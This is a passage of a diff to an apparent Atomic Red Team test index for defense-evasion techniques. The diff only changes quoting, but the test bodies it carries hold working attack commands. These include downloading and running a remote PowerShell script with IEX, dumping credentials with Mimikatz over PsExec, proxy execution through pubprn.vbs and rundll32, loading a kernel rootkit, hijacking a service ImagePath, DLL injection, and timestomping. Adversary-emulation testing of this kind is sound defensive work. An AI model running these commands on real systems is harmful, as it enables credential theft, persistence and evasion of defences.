-i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' T1205.001: technique: external_references: @@ -34256,13 +34256,13 @@ defense-evasion: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore - ' +' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process - ' +' supported_platforms: - windows input_arguments: @@ -34274,7 +34274,7 @@ defense-evasion: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -34285,7 +34285,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -34408,7 +34408,7 @@ defense-evasion: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -34419,7 +34419,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -34454,7 +34454,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -34469,10 +34469,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -34483,7 +34483,7 @@ defense-evasion: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" - ' +' name: command_prompt elevation_required: false T1055.008: @@ -34618,7 +34618,7 @@ defense-evasion: description: 'Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. - ' +' supported_platforms: - windows input_arguments: @@ -34630,7 +34630,7 @@ defense-evasion: command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" - ' +' name: command_prompt T1542.004: technique: @@ -34853,7 +34853,7 @@ defense-evasion: description: 'Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn''t really execute either." will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -34870,10 +34870,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) - ' +' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34883,7 +34883,7 @@ defense-evasion: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file} cleanup_command: 'del #{output_file} >nul 2>&1 - ' +' name: command_prompt - name: Regsvcs Uninstall Method Call Test auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 @@ -34906,10 +34906,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) - ' +' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34998,7 +34998,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -35018,10 +35018,10 @@ defense-evasion: dependencies: - description: 'Regsvr32.sct must exist on disk at specified location (#{filename}) - ' +' prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#{filename}" @@ -35056,7 +35056,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -35077,10 +35077,10 @@ defense-evasion: - description: 'AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) - ' +' prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" @@ -35088,14 +35088,14 @@ defense-evasion: command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} ) - ' +' name: command_prompt - name: Regsvr32 Registering Non DLL auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 description: 'Replicating observed Gozi maldoc behavior registering a dll with an altered extension - ' +' supported_platforms: - windows input_arguments: @@ -35115,13 +35115,13 @@ defense-evasion: dependencies: - description: 'Test requires a renamed dll file - ' +' prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 ) - ' +' get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}" - ' +' executor: name: command_prompt elevation_required: false @@ -35237,7 +35237,7 @@ defense-evasion: %SystemRoot%\Temp\lsass.exe /B cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading as Linux crond process. auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 @@ -35253,7 +35253,7 @@ defense-evasion: echo 'sleep 5' | /tmp/crond cleanup_command: 'rm /tmp/crond - ' +' name: sh - name: Masquerading - cscript.exe running as notepad.exe auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 @@ -35269,7 +35269,7 @@ defense-evasion: cmd.exe /c %APPDATA%\notepad.exe /B cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - wscript.exe running as svchost.exe auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 @@ -35285,7 +35285,7 @@ defense-evasion: cmd.exe /c %APPDATA%\svchost.exe /B cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - powershell.exe running as taskhostw.exe auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa @@ -35301,7 +35301,7 @@ defense-evasion: cmd.exe /K %APPDATA%\taskhostw.exe cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - non-windows exe running as windows exe auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 @@ -35324,10 +35324,10 @@ defense-evasion: dependencies: - description: 'Exe file to copy must exist on disk at specified location (#{inputfile}) - ' +' prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}" @@ -35338,14 +35338,14 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' name: powershell - name: Masquerading - windows exe running as different windows exe auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 description: 'Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe - ' +' supported_platforms: - windows input_arguments: @@ -35364,7 +35364,7 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' name: powershell - name: Malicious process Masquerading as LSM.exe auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f @@ -35646,7 +35646,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -35660,10 +35660,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -35696,7 +35696,7 @@ defense-evasion: Write-Host "End of DCShadow" cleanup_command: 'Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore - ' +' T1014: technique: id: attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b @@ -35774,7 +35774,7 @@ defense-evasion: auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 description: 'Loadable Kernel Module based Rootkit - ' +' supported_platforms: - linux input_arguments: @@ -35799,10 +35799,10 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) - ' +' prereq_command: 'if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{rootkit_source_path}/* #{temp_folder}/ @@ -35812,17 +35812,17 @@ defense-evasion: executor: command: 'sudo insmod #{rootkit_path} - ' +' cleanup_command: 'sudo rmmod #{rootkit_name} - ' +' name: sh elevation_required: true - name: Loadable Kernel Module based Rootkit auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f description: 'Loadable Kernel Module based Rootkit - ' +' supported_platforms: - linux input_arguments: @@ -35847,11 +35847,11 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) - ' +' prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;\ncp #{rootkit_source_path}/* #{temp_folder}/\ncd #{temp_folder}; make \nsudo cp #{temp_folder}/#{rootkit_name}.ko @@ -35860,7 +35860,7 @@ defense-evasion: executor: command: 'sudo modprobe #{rootkit_name} - ' +' cleanup_command: | sudo modprobe -r #{rootkit_name} sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko @@ -35990,7 +35990,7 @@ defense-evasion: description: 'Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. - ' +' supported_platforms: - windows input_arguments: @@ -36001,7 +36001,7 @@ defense-evasion: executor: command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); - ' +' name: command_prompt - name: Rundll32 execute VBscript command auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb @@ -36019,7 +36019,7 @@ defense-evasion: executor: command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) - ' +' name: command_prompt - name: Rundll32 advpack.dll Execution auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 @@ -36038,17 +36038,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, - ' +' name: command_prompt - name: Rundll32 ieadvpack.dll Execution auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 @@ -36068,17 +36068,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, - ' +' name: command_prompt - name: Rundll32 syssetup.dll Execution auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 @@ -36097,10 +36097,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36108,7 +36108,7 @@ defense-evasion: command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} - ' +' name: command_prompt - name: Rundll32 setupapi.dll Execution auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 @@ -36127,10 +36127,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36138,7 +36138,7 @@ defense-evasion: command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} - ' +' name: command_prompt - name: Execution of HTA and VBS Files using Rundll32 and URL.dll auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 @@ -36161,7 +36161,7 @@ defense-evasion: description: 'Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. - ' +' supported_platforms: - windows input_arguments: @@ -36172,7 +36172,7 @@ defense-evasion: executor: command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} - ' +' name: command_prompt T1134.005: technique: @@ -36571,7 +36571,7 @@ defense-evasion: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: @@ -36591,22 +36591,22 @@ defense-evasion: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1548.001: technique: @@ -36662,7 +36662,7 @@ defense-evasion: description: 'Make, change owner, and change file attributes on a C source code file - ' +' supported_platforms: - macos - linux @@ -36688,7 +36688,7 @@ defense-evasion: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -36704,14 +36704,14 @@ defense-evasion: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -36727,7 +36727,7 @@ defense-evasion: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -36759,7 +36759,7 @@ defense-evasion: description: 'This test gives a file the capability to set UID without using flags. - ' +' supported_platforms: - linux input_arguments: @@ -36773,7 +36773,7 @@ defense-evasion: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} - ' +' name: sh elevation_required: true T1218: @@ -36832,7 +36832,7 @@ defense-evasion: description: 'Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -36848,17 +36848,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} - ' +' name: command_prompt elevation_required: true - name: SyncAppvPublishingServer - Execute arbitrary PowerShell code @@ -36866,7 +36866,7 @@ defense-evasion: description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -36877,14 +36877,14 @@ defense-evasion: executor: command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}" - ' +' name: command_prompt - name: Register-CimProvider - Execute evil dll auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB - ' +' supported_platforms: - windows input_arguments: @@ -36896,17 +36896,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} - ' +' name: command_prompt - name: InfDefaultInstall.exe .inf Execution auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef @@ -36925,17 +36925,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" executor: command: 'InfDefaultInstall.exe #{inf_to_execute} - ' +' name: command_prompt - name: ProtocolHandler.exe Downloaded a Suspicious File auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 @@ -36943,7 +36943,7 @@ defense-evasion: Office. On successful execution you should see Microsoft Word launch a blank file. - ' +' supported_platforms: - windows input_arguments: @@ -36956,15 +36956,15 @@ defense-evasion: - description: 'Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided - ' +' prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} - ' +' get_prereq_command: 'write-host "Install Microsoft Word or provide correct path." - ' +' executor: name: command_prompt elevation_required: false @@ -36976,7 +36976,7 @@ defense-evasion: description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe - ' +' supported_platforms: - windows input_arguments: @@ -36998,15 +36998,15 @@ defense-evasion: prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} - ' +' get_prereq_command: 'write-host ".Net must be installed for this test to work correctly." - ' +' executor: command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt - ' +' name: powershell elevation_required: false - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions @@ -37014,7 +37014,7 @@ defense-evasion: description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe - ' +' supported_platforms: - windows input_arguments: @@ -37043,7 +37043,7 @@ defense-evasion: get_prereq_command: 'write-host "you need to rename workflow complier before you run this test" - ' +' executor: command: "#{renamed_binary} #{xml_payload} output.txt\n" name: powershell @@ -37086,7 +37086,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}' @@ -37153,14 +37153,14 @@ defense-evasion: executor: command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}" - ' +' name: command_prompt - name: manage-bde.wsf Signed Script Command Execution auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a description: 'Executes the signed manage-bde.wsf script with options to execute an arbitrary command. - ' +' supported_platforms: - windows input_arguments: @@ -37174,7 +37174,7 @@ defense-evasion: cscript %windir%\System32\manage-bde.wsf cleanup_command: 'set comspec=%windir%\System32\cmd.exe - ' +' name: command_prompt T1027.002: technique: @@ -37250,10 +37250,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary packed by UPX, with modified headers (linux) auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 @@ -37272,10 +37272,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary simply packed by UPX auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 @@ -37292,10 +37292,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary packed by UPX, with modified headers auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d @@ -37314,10 +37314,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh T1036.006: technique: @@ -37371,7 +37371,7 @@ defense-evasion: auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f description: 'Space After Filename - ' +' supported_platforms: - macos executor: @@ -37383,7 +37383,7 @@ defense-evasion: auto_generated_guid: b95ce2eb-a093-4cd8-938d-5258cef656ea description: 'Space after filename. - ' +' supported_platforms: - macos - linux @@ -37605,7 +37605,7 @@ defense-evasion: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. - ' +' supported_platforms: - macos - linux @@ -37619,7 +37619,7 @@ defense-evasion: This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -37634,7 +37634,7 @@ defense-evasion: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -37744,7 +37744,7 @@ defense-evasion: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; - ' +' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -37754,7 +37754,7 @@ defense-evasion: This is meant to find the result of Not supported, which is the result if run in a virtual machine - ' +' supported_platforms: - windows executor: @@ -37771,7 +37771,7 @@ defense-evasion: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. - ' +' supported_platforms: - macos executor: @@ -37781,7 +37781,7 @@ defense-evasion: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; - ' +' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system @@ -38036,7 +38036,7 @@ defense-evasion: executor: command: 'start #{docx_file} - ' +' name: command_prompt T1055.003: technique: @@ -38279,7 +38279,7 @@ defense-evasion: auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 description: 'Stomps on the access timestamp of a file - ' +' supported_platforms: - linux - macos @@ -38291,13 +38291,13 @@ defense-evasion: executor: command: 'touch -a -t 197001010000.00 #{target_filename} - ' +' name: sh - name: Set a file's modification timestamp auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 description: 'Stomps on the modification timestamp of a file - ' +' supported_platforms: - linux - macos @@ -38309,7 +38309,7 @@ defense-evasion: executor: command: 'touch -m -t 197001010000.00 #{target_filename} - ' +' name: sh - name: Set a file's creation timestamp auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b @@ -38355,7 +38355,7 @@ defense-evasion: executor: command: 'touch -acmr #{reference_file_path} #{target_file_path} - ' +' name: sh - name: Windows - Modify file creation timestamp with PowerShell auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c @@ -38378,10 +38378,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the creation time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38389,10 +38389,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Modify file last modified timestamp with PowerShell auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 @@ -38415,10 +38415,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the modified time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38426,10 +38426,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Modify file last access timestamp with PowerShell auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 @@ -38452,10 +38452,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the last access time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38463,10 +38463,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Timestomp a File auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 @@ -38484,25 +38484,25 @@ defense-evasion: dependencies: - description: 'timestomp.ps1 must be present in #{file_path}. - ' +' prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1" - ' +' - description: 'kxwn.lock must be present in #{file_path}. - ' +' prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File - ' +' executor: command: | import-module #{file_path}\timestomp.ps1 @@ -39476,10 +39476,10 @@ defense-evasion: - description: 'Test requrires a file to take ownership of to be located at (#{file_folder_to_own}) - ' +' prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_folder_to_own} echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt @@ -39487,7 +39487,7 @@ defense-evasion: executor: command: 'takeown.exe /f #{file_folder_to_own} /r - ' +' name: command_prompt - name: cacls - Grant permission to specified user or group 